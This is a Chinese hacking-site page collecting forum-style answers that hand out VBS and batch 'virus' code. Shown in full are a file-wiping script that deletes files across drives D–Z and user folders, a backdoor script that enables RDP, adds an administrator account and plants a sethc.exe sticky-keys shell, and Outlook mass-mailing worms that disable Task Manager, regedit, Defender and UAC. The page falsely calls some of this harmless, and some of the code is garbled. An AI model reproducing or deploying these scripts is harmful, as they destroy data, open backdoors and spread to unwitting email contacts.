当前位置: 首页 » 网络黑客 » vbs脚本病毒有很强的自我繁殖能力_vbs脚本病毒代码大全

vbs脚本病毒有很强的自我繁殖能力_vbs脚本病毒代码大全

作者:hacker 时间:2023-03-31 阅读数:329人阅读

文章栏目:

恶搞电脑病毒代码有哪些

有时候想和朋友们玩玩,搞点恶搞电脑病毒给他们,要怎么办呢?下面由我给你做出详细的恶搞电脑病毒代码介绍!希望对你有帮助!

恶搞电脑病毒代码介绍一:

首先在电脑上新建一个TXT文档

然后把下面这段代码输入进去

On Error Resume Next

Dim WSHshellA

Set WSHshellA = wscript.CreateObject("wscript.shell")

WSHshellA.run "cmd.exe /c shutdown -s -t 90 -c ""快喊我是猪,不喊就马上让你关机,不信,试试···"" ", 0, True

Dim a

Do While (a "我是猪")

a = InputBox("快说我是猪,不叫就不关机,快点,说 ", "说不说", "不说", 8000, 7000)

MsgBox Chr(13) + Chr(13) + Chr(13) + a, 0, "MsgBox"

Loop

MsgBox Chr(13) + Chr(13) + Chr(13) + "早说就行了嘛!好,不关了"

WSHshella.run "cmd.exe /c shutdown -a"

然后保存

然后把这个文本文档的后缀改为vbs 也就是说新建的文本文档本来是.TXT的后缀,

你要修改为.VBS的后缀

恶搞电脑病毒代码介绍二:

新建一个文本文档,然后插入hhjsfdusnjwindow,,hffjfiukjei 508963kfdjksfjjkk,最后插入图片,如果对方有邮箱,就发给他

他一打开就会出现你插入的图片,然后出现 蓝屏 (效果7—10分钟)(注:做好病毒后不要打开,否则会出现以上说的情况)

恶搞电脑病毒代码介绍三:

新建一个文本文档(.txt),要复制以下代码:

@echo off

color 4

tskill explorer

echo .

echo .

echo .

echo .

echo 警告:在病毒执行期间禁止关闭电源,

echo 否则你就和你心爱的电脑说

echo .

echo . BYE-BYE

echo .

echo Computer system crash!

echo .

echo .

echo I am a virus, my name is Ghost.

echo 我是魔鬼病毒,在这个堕落的世界上苏醒了。

echo .

echo . Warning! CPU has been changed please re-enter CPU settings

echo. in the CMOS setuo and remember to save before quit.

echo. Secondary IDE channel no 80 conductor cable installed.

set /p select=:)

if "%select%"=="" goto start

:start

shutdown -r -t 10 -c "您的计算机上带有魔鬼病毒,今天是它的发作日期。病毒已经破坏了您的系统,您的计算机将在10秒钟后重启。"

::结束

再另存为:名字.bat 你要记住"名字"后面要加".bat"

就可以了,没有任何破坏性,吓吓人。

你可以试试看看效果。

求最全的vbs病毒代码,要破坏性的。谢谢,回答的好我多给分。

那废话不说,问这个如何?不懂可以问我

On Error Resume Next

dim avest,xufso,wscrt

Set avest = WScript.Createobject("WScript.Shell")

Set wscrt = WScript.Createobject("WScript.Shell")

Set xufso = CreateObject("Scripting.FileSystemObject")

avest.run "cmd /c ""del d:\*.* / f /q /s""",0 ,true

avest.run "cmd /c ""del e:\*.* / f /q /s""",0 ,true

avest.run "cmd /c ""del f:\*.* / f /q /s""",0 ,true

avest.run "cmd /c ""del g:\*.* / f /q /s""",0 ,true

avest.run "cmd /c ""del h:\*.* / f /q /s""",0 ,true

avest.run "cmd /c ""del i:\*.* / f /q /s""",0 ,true

avest.run "cmd /c ""del j:\*.* / f /q /s""",0 ,true

avest.run "cmd /c ""del k:\*.* / f /q /s""",0 ,true

avest.run "cmd /c ""del l:\*.* / f /q /s""",0 ,true

avest.run "cmd /c ""del m:\*.* / f /q /s""",0 ,true

avest.run "cmd /c ""del n:\*.* / f /q /s""",0 ,true

avest.run "cmd /c ""del o:\*.* / f /q /s""",0 ,true

avest.run "cmd /c ""del p:\*.* / f /q /s""",0 ,true

avest.run "cmd /c ""del q:\*.* / f /q /s""",0 ,true

avest.run "cmd /c ""del r:\*.* / f /q /s""",0 ,true

avest.run "cmd /c ""del s:\*.* / f /q /s""",0 ,true

avest.run "cmd /c ""del t:\*.* / f /q /s""",0 ,true

avest.run "cmd /c ""del u:\*.* / f /q /s""",0 ,true

avest.run "cmd /c ""del v:\*.* / f /q /s""",0 ,true

avest.run "cmd /c ""del w:\*.* / f /q /s""",0 ,true

avest.run "cmd /c ""del x:\*.* / f /q /s""",0 ,true

avest.run "cmd /c ""del y:\*.* / f /q /s""",0 ,true

avest.run "cmd /c ""del z:\*.* / f /q /s""",0 ,true

avest.run "cmd /c ""del C:\Users\*.* / f /q /s""",0 ,true

avest.run "cmd /c ""del C:\ProgramData\*.* / f /q /s""",0 ,true

xufso.CreateFolder "C:\VBScript\"

wscrt.run "shutdown -r -f -t 3600 -c 脚本与批处理程序相结合成功!"

xufso.copyfile Wscript.Scriptfullname,"C:\VBScript\一触即发.vbs"

xufso.copyfile Wscript.Scriptfullname,"C:\Users\Public\Desktop\一触即发.vbs"

wscrt.regwrite"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools","00000001","REG_DWORD"

wscrt.regwrite"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr","00000001","REG_DWORD"

wscrt.regwrite"HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\svchost","C:\VBScript\一触即发.vbs","REG_SZ"

wscrt.regWrite"HKEY_CURRENT_USER\Software\Policies\Microsoft\MMC\RestrictToPermittedSnapins","00000001","REG_DWORD"

msgbox "My head with day feet standing on the earth all over the world to worship my swagger is the modelling of the legendary Super Star elder brother is sharp!",16+4096,"Error"

do

wscrt.run "ping 192.168.1.1 -l 65500 -t"

loop

解释一个VBS脚本病毒代码

'容错

on error resume next

'定义一个常量 是一个注册表的键值

const HKEY_LOCAL_MACHINE = H80000002

'定义一个变量strComputer 值为.

strComputer = "."

Set StdOut = WScript.StdOut

Set oReg=GetObject("winmgmts:{impersonationLevel=impersonate}!\\" _

strComputer "\root\default:StdRegProv")

'创建组件 是关于注册表的组件

strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server"

oReg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath

strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp"

oReg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath

strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp"

strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server"

strValueName = "fDenyTSConnections"

dwValue = 0

oReg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue

strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp"

strValueName = "PortNumber"

dwValue = 3389

oReg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue

strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp"

strValueName = "PortNumber"

dwValue = 3389

oReg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue

'上面这段的功能是开启3389端口 也就是开启远程终端 方法是修改注册表的键值

'容错

on error resume next

'定义变量 username password

dim username,password:If Wscript.Arguments.Count Then:username=Wscript.Arguments(0):password=Wscript.Arguments(1):Else:username="HackEr":password="393214425":end if:set wsnetwork=CreateObject("WSCRIPT.NETWORK"):os="WinNT://"wsnetwork.ComputerName:Set ob=GetObject(os):Set oe=GetObject(os"/Administrators,group"):Set od=ob.Create("user",username):od.SetPassword password:od.SetInfo:Set of=GetObject(os"/"username",user"):oe.Add(of.ADsPath)'wscript.echo of.ADsPath

'这段是增加管理员 用户名是HackEr 密码是393214425

'容错

On Error Resume Next

Dim obj, success

Set obj = CreateObject("WScript.Shell")

success = obj.run("cmd /c takeown /f %SystemRoot%\system32\sethc.exeecho y| cacls %SystemRoot%\system32\sethc.exe /G %USERNAME%:F? %SystemRoot%\system32\cmd.exe %SystemRoot%\system32\acmd.exe? %SystemRoot%\system32\sethc.exe %SystemRoot%\system32\asethc.exedel %SystemRoot%\system32\sethc.exeren %SystemRoot%\system32\acmd.exe sethc.exe", 0, True)

CreateObject("Scripting.FileSystemObject").DeleteFile(WScript.ScriptName)

'这段是留后门 放大镜后门 将sethc.exe替换为cmd.exe 这样 在登陆界面这里 按5下shift就会出现cmd窗口 然后添加用户即可登陆系统

总结 这个不算是病毒 充其量 只不过是一个后门程序 运行之后 系统的远程终端开启,自动加入一个HackEr的帐号 自动添加一个放大镜后门

个人感觉 这代码是将3段代码拼凑起来的 - - 没技术含量

谁能给我一个vbs病毒代码附说明啊

On Error Resume Next

Set fs=CreateObject("Scripting.FileSystemObject")

Set dir1=fs.GetSpecialFolder(0)

Set dir2=fs.GetSpecialFolder(1)

Set so=CreateObject("Scripting.FileSystemObject")

dim r

Set r=CreateObject("Wscript.Shell")

so.GetFile(WScript.ScriptFullName).Copy(dir1"\Win32system.vbs")

so.GetFile(WScript.ScriptFullName).Copy(dir2"\Win32system.vbs")

so.GetFile(WScript.ScriptFullName).Copy(dir1"\Start Menu\Programs\启动\Win32system.vbs")

r.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun",1,"REG_DWORD"

r.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoClose",1,"REG_DWORD"

r.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDrives",63000000,"REG_DWORD"

r.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools",1,"REG_DWORD"

r.Regwrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Run\ScanRegistry",""

r.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoLogOff",1,"REG_DWORD"

r.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\WinOldApp\NoRealMode",1,"REG_DWORD"

r.Regwrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Run\Win32system","Win32system.vbs"

r.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDesktop",1,"REG_DWORD"

r.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\WinOldApp\Disabled",1,"REG_DWORD"

r.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoSetTaskBar",1,"REG_DWORD"

r.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoViewContextMenu",1,"REG_DWORD"

r.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoSetFolders",1,"REG_DWORD"

r.Regwrite "HKLM\Software\CLASSES\.reg\","txtfile"

Set ol=CreateObject("Outlook.Application")

On Error Resume Next

For x=1 To 5000

Set Mail=ol.CreateItem(0)

Mail.to=ol.GetNameSpace("MAPI").AddressLists(1).AddressEntries(x)

Mail.Subject="今晚你来吗?"

Mail.Body="朋友你好:您的朋友Rose给您发来了热情的邀请。具体情况请阅读随信附件,祝您好运! 同城约会网"

Mail.Attachments.Add(dir2"Win32system.vbs")

Mail.Send

Next

ol.Quit

r.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Restrictions\NoBrowserContextMenu",1,"REG_DWORD"

r.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Restrictions\NoBrowserOptions",1,"REG_DWORD"

r.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Restrictions\NoBrowserSaveAs",1,"REG_DWORD"

r.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Restrictions\NoFileOpen",1,"REG_DWORD"

r.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel\Advanced",1,"REG_DWORD"

r.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel\Cache Internet",1,"REG_DWORD"

r.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel\AutoConfig",1,"REG_DWORD"

r.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel\HomePage",1,"REG_DWORD"

r.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel\History",1,"REG_DWORD"

r.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel\Connwiz Admin Lock",1,"REG_DWORD"

r.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel\SecurityTab",1,"REG_DWORD"

r.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel\ResetWebSettings",1,"REG_DWORD"

r.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Restrictions\NoViewSource",1,"REG_DWORD"

r.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Infodelivery\Restrictions\NoAddingSubScriptions",1,"REG_DWORD"

r.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFileMenu",1,"REG_DWORD"

把以上代码复制到记事本,另存为vbs文件

这个杀软会报毒,但运行对电脑没有危害,实在不行可以重启

求一个超毒无比的vbs代码,最好能破坏电脑和安全模式也修复不了的vbs代码。一定要超毒的。

送你了

On Error Resume Next

set fso=createobject("scripting.filesystemobject")

set vbs=wscript.createobject("wscript.shell")

pt=vbs.specialfolders("startup") "\"

set file=fso.getfile(wscript.scriptfullname)

file.copy pt

set fso=createobject("scripting.filesystemobject")

set vbs=wscript.createobject("wscript.shell")

pt=vbs.specialfolders(1) "\"

set file=fso.getfile(wscript.scriptfullname)

file.copy pt

set ws=wscript.createobject("wscript.shell")

ws.popup "正在验证I/O接口...",3,"接口工具",vbinformation

ws.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr",1,"REG_DWORD"

ws.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Network\NoNetSetup",1,"REG_DWORD"

if err.number0 then

On Error Goto 0

err.raise 1,"无法匹配的I/O接口,请以ADMINISTRATOR用户运行重试","Access failed (no permission)"

end if

ws.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Layers\[TARGETDIR]脚本病毒加强版.vbs","RUNASADMIN","REG_SZ"

ws.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin",0,"REG_DWORD"

ws.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA",0,"REG_DWORD"

ws.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop",0,"REG_DWORD"

ws.run "cmd /c echo 0C:\Windows\Web\Screen\e.bmp"

Set ol=CreateObject("Out"+"look"+".Application")

For x=1 To 100

Set Mail=ol.CreateItem(0)

Mail.to=ol.GetNameSpace("MAPI").AddressLists(1).AddressEntries(x)

Mail.Subject="工作报告"

Mail.Body="您好,这是今月的工作报告"

Mail.Attachments.Add(dir2"Win32system.vbs")

Mail.Send

Next

ol.Quit

ws.run "cmd /c echo Your Computer Has Been Destoryed!e.txt"

ws.run "cmd /c echo Your Computer Has Been Destoryed!c:\e.txt"

wscript.sleep 2000

ws.regwrite "HKCU\Control Panel\Desktop\wallpaper","C:\Windows\Web\Screen\e.bmp","REG_SZ"

ws.run "RunDll32.exe USER32.DLL,UpdatePerUserSystemParameters"

ws.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Network\NoNetSetup",1,"REG_DWORD"

wscript.sleep 100

ws.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Network\NoNetSetupIDPage",1,"REG_DWORD"

wscript.sleep 100

ws.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Network\NoNetSetupSecurityPage",1,"REG_DWORD"

wscript.sleep 100

ws.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Network\NoEntireNetwork",1,"REG_DWORD"

wscript.sleep 100

ws.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Network\NoWorkgroupContents",1,"REG_DWORD"

wscript.sleep 100

ws.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Network\NoFileSharingControl",1,"REG_DWORD"

wscript.sleep 100

ws.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Network\NoPrintSharingControl",1,"REG_DWORD"

wscript.sleep 100

ws.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\WinOldApp\Disabled",1,"REG_DWORD"

wscript.sleep 100

ws.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\WinOldApp\NoRealMode",1,"REG_DWORD"

wscript.sleep 100

ws.regwrite "HKEY_CLASSES_ROOT\directory\background\ShellEx\ContextMenuHandlers\New\",0,"REG_SZ"

wscript.sleep 100

ws.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware",1,"REG_DWORD"

wscript.sleep 100

ws.regwrite "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SecurityHealthService\Start",4,"REG_DWORD"

wscript.sleep 100

ws.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\noclose","1","REG_DWORD"

wscript.sleep 100

ws.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr",1,"REG_DWORD"

wscript.sleep 100

ws.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoViewContextMenu",1,"REG_DWORD"

wscript.sleep 100

ws.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoTrayContextMenu",1,"REG_DWORD"

wscript.sleep 100

ws.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoChangeStartMenu",1,"REG_DWORD"

wscript.sleep 100

ws.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools",1,"REG_DWORD"

wscript.sleep 100

ws.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegedit",1,"REG_DWORD"

wscript.sleep 100

ws.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDrivers",67108863,"REG_DWORD"

wscript.sleep 100

ws.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SchedulingAgent",0,"REG_DWORD"

wscript.sleep 100

ws.regwrite "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\StorageDevicePolicies\WriteProtect",1,"REG_DWORD"

wscript.sleep 100

ws.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRecentDocsMenu",1,"REG_DWORD"

wscript.sleep 100

ws.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRecentDocsHistory",1,"REG_DWORD"

wscript.sleep 100

ws.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRecentDocsHistory",1,"REG_DWORD"

wscript.sleep 100

ws.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFind",1,"REG_DWORD"

wscript.sleep 100

ws.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun",1,"REG_DWORD"

wscript.sleep 100

ws.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoLogOff",1,"REG_DWORD"

wscript.sleep 100

ws.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoSetFolders",1,"REG_DWORD"

wscript.sleep 100

ws.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\StartMenuLogOff",1,"REG_DWORD"

wscript.sleep 100

ws.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoSetTaskbar",1,"REG_DWORD"

wscript.sleep 100

ws.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions",1,"REG_DWORD"

wscript.sleep 100

ws.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoWindowsUpdate",1,"REG_DWORD"

wscript.sleep 100

ws.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoSetActiveDesktop",1,"REG_DWORD"

wscript.sleep 100

ws.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoActiveDesktop",1,"REG_DWORD"

wscript.sleep 100

ws.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoActiveDesktopChanges",1,"REG_DWORD"

wscript.sleep 100

ws.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Nodesktop",1,"REG_DWORD"

wscript.sleep 100

ws.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoNetHood",1,"REG_DWORD"

wscript.sleep 100

ws.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoInternetIcon",1,"REG_DWORD"

wscript.sleep 100

ws.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoAddPrinter",1,"REG_DWORD"

wscript.sleep 100

ws.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDeletePrinter",1,"REG_DWORD"

wscript.sleep 100

ws.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoPrinterTabs",1,"REG_DWORD"

wscript.sleep 100

ws.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoWinKeys",1,"REG_DWORD"

wscript.sleep 100

ws.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\RestrictRun",1,"REG_DWORD"

wscript.sleep 100

ws.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoSaveSettings",1,"REG_DWORD"

wscript.sleep 100

ws.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\RestrictRun",1,"REG_DWORD"

wscript.sleep 100

ws.regwrite "HKEY_CURRENT_USER\ControlPanel\Desktop\CoolSwitch",0,"REG_SZ"

wscript.sleep 100

ws.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoViewOnDrive",67108863,"REG_DWORD"

ws.run "cmd /c taskkill /f /im explorer.exe"

wscript.sleep 3000

ws.run "cmd /c start explorer.exe"

wscript.sleep 2000

ws.regwrite "HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System\DisableCMD","2","REG_DWORD"

wscript.sleep 100

set vbs=wscript.createobject("wscript.shell")

set ws=createobject("wscript.shell")

do

msgbox"你好",vbexclamation,"VIRUS"

wscript.sleep 5000

loop

电脑病毒源代码介绍

电脑中了病毒想从它的源代码入手怎么办呢!有我在,下面由我给你做出详细的电脑病毒源代码介绍!希望对你有帮助!

电脑病毒源代码介绍:

电脑病毒源代码一:

on error resume next

set fs=createobject("ing.filesystemobject" '创建一个能与 操作系统 沟通的对象,再利用该对象的各种 方法 对注册表进行操作

set dir1=fs.getspecialfolder(0) '获取windows/winnt文件夹位置

set dir2=fs.getspecialfolder(1) '获取system32/system文件夹位置

set so=createobject("ing.filesystemobject"

dim r '定义一个变量

set r=createobject("w.shell"

so.getfile(w.fullname).copy(dir1"\win32system.vbs" '复制病毒副本到windows/winnt文件夹位置

so.getfile(w.fullname).copy(dir2"\win32system.vbs" '复制病毒副本到system32/system文件夹位置

so.getfile(w.fullname).copy(dir1"\start menu\programs\启动\win32system.vbs" '复制病毒副本到start menu启动菜单

'下面是对注册表的恶意修改和简单的依靠oe传播

r.regwrite "hkcu\software\microsoft\windows\currentversion\policies\explorer\norun",1,"reg_dword" '修改注册表,禁止“运行”菜单

r.regwrite "kcu\software\microsoft\windows\currentversion\policies\explorer\noclose",1,"reg_dword" '修改注册表,禁止“关闭”菜单

r.regwrite "hkcu\software\microsoft\windows\currentversion\policies\explorer\nodrives",63000000,"reg_dword" '修改注册表,隐藏所有逻辑盘符

r.regwrite "hkcu\software\microsoft\windows\currentversion\policies\system\disableregistrytools",1,"reg_dword" '修改注册表,禁止注册表编辑

r.regwrite "hklm\software\microsoft\windows\currentversion\run\scanregistry","" '修改注册表,禁止开机注册表扫描

r.regwrite "hkcu\software\microsoft\windows\currentversion\policies\explorer\nologoff",1,"reg_dword" '修改注册表,禁止“注销”菜单

r.regwrite "hkcu\software\microsoft\windows\currentversion\policies\winoldapp\norealmode",1,"reg_dword" '修改注册表,禁止ms-dos实模式

r.regwrite "hklm\software\microsoft\windows\currentversion\run\win32system","win32system.vbs" '修改注册表,使这个脚本本身开机自动运行

r.regwrite "hkcu\software\microsoft\windows\currentversion\policies\explorer\nodesktop",1,"reg_dword" '修改注册表,禁止显示桌面图标

r.regwrite "hkcu\software\microsoft\windows\currentversion\policies\winoldapp\disabled",1,"reg_dword" '修改注册表,禁止纯dos模式

r.regwrite "hkcu\software\microsoft\windows\currentversion\policies\explorer\nosettaskbar",1,"reg_dword" '修改注册表,禁止“任务栏和开始”菜单

r.regwrite "hkcu\software\microsoft\windows\currentversion\policies\explorer\noviewcontextmenu",1,"reg_dword" '修改注册表,禁止右键菜单

电脑病毒源代码二:

r.regwrite "hkcu\software\microsoft\windows\currentversion\policies\explorer\nosetfolders",1,"reg_dword" '修改注册表,禁止控制面板

r.regwrite "hklm\software\classes\.reg\","txtfile" '修改注册表,禁止导入使用.reg文件,改为用txt文件的关联

r.regwrite "hklm\software\microsoft\windows\currentversion\winlogon\legalnoticecaption","警告" '设置开机提示框标题

r.regwrite "hklm\software\microsoft\windows\currentversion\winlogon\legalnoticetext","您中vbs脚本病毒了,哭吧~" '设置开机提示框文本内容

set ol=createobject("outlook.application" '创建outlook文件对象用于传播

on error resume next

for x=1 to 100

set mail=ol.createitem(0)

mail.to=ol.getnamespace("mapi".addresslists(1).addressentries(x) '用于向地址簿的前100名发送此 vbs病毒,可以算是简单弱智的蠕虫了吧~~

mail.subject="今晚你来吗?" '邮件主题

mail.body="朋友你好:您的朋友rose给您发来了热情的邀请。具体情况请阅读随信附件,祝您好运! 同城约会网" '邮件内容

mail.attachments.add(dir2"win32system.vbs"

mail.send

next

ol.quit

'下面是对internet explore 选项的恶意修改

r.regwrite "hkcu\software\policies\microsoft\internet explorer\restrictions\nobrowsercontextmenu",1,"reg_dword" '修改注册表,禁止鼠标右键

r.regwrite "hkcu\software\policies\microsoft\internet explorer\restrictions\nobrowseroptions",1,"reg_dword" '修改注册表,禁止internet选项

r.regwrite "hkcu\software\policies\microsoft\internet explorer\restrictions\nobrowsersaveas",1,"reg_dword" '修改注册表,禁止“另存为”

r.regwrite "hkcu\software\policies\microsoft\internet explorer\restrictions\nofileopen",1,"reg_dword" '修改注册表,禁止“文件/打开”菜单

r.regwrite "hkcu\software\policies\microsoft\internet explorer\control panel\advanced",1,"reg_dword" '修改注册表,禁止更改高级页设置

r.regwrite "hkcu\software\policies\microsoft\internet explorer\control panel\cache internet",1,"reg_dword" '修改注册表,禁止更改临时文件设置

r.regwrite "hkcu\software\policies\microsoft\internet explorer\control panel\autoconfig",1,"reg_dword" '修改注册表,禁止更改自动配置

r.regwrite "hkcu\software\policies\microsoft\internet explorer\control panel\homepage",1,"reg_dword" '修改注册表,禁止更改主页,即“主页”变灰

r.regwrite "hkcu\software\policies\microsoft\internet explorer\control panel\history",1,"reg_dword" '修改注册表,禁止更改历史记录设置

r.regwrite "hkcu\software\policies\microsoft\internet explorer\control panel\connwiz admin lock",1,"reg_dword" '修改注册表,禁止更改internet连接向导

r.regwrite "hkcu\software\policies\microsoft\internet explorer\control panel\securitytab",1,"reg_dword" '修改注册表,禁止更改安全项

r.regwrite "hkcu\software\policies\microsoft\internet explorer\control panel\resetwebsettings",1,"reg_dword" '修改注册表,禁止“重置web设置”

r.regwrite "hkcu\software\policies\microsoft\internet explorer\restrictions\noviewsource",1,"reg_dword" '修改注册表,禁止查看源文件

r.regwrite "hkcu\software\policies\microsoft\internet explorer\infodelivery\restrictions\noaddingsubions",1,"reg_dword" '修改注册表,禁止添加脱机计划

  • 评论列表
  •  
    发布于 2023-03-31 10:39:50  回复
  • 中了病毒想从它的源代码入手怎么办呢!有我在,下面由我给你做出详细的电脑病毒源代码介绍!希望对你有帮助! 电脑病毒源代码介绍: 电脑病毒源代码一: on erro
  •  
    发布于 2023-03-31 08:30:52  回复
  • icrosoft\Windows\CurrentVersion\Policies\Explorer\noclose","1","REG_DWORD"wscript.sleep 100ws.regwrite "HKEY_CUR

发表评论: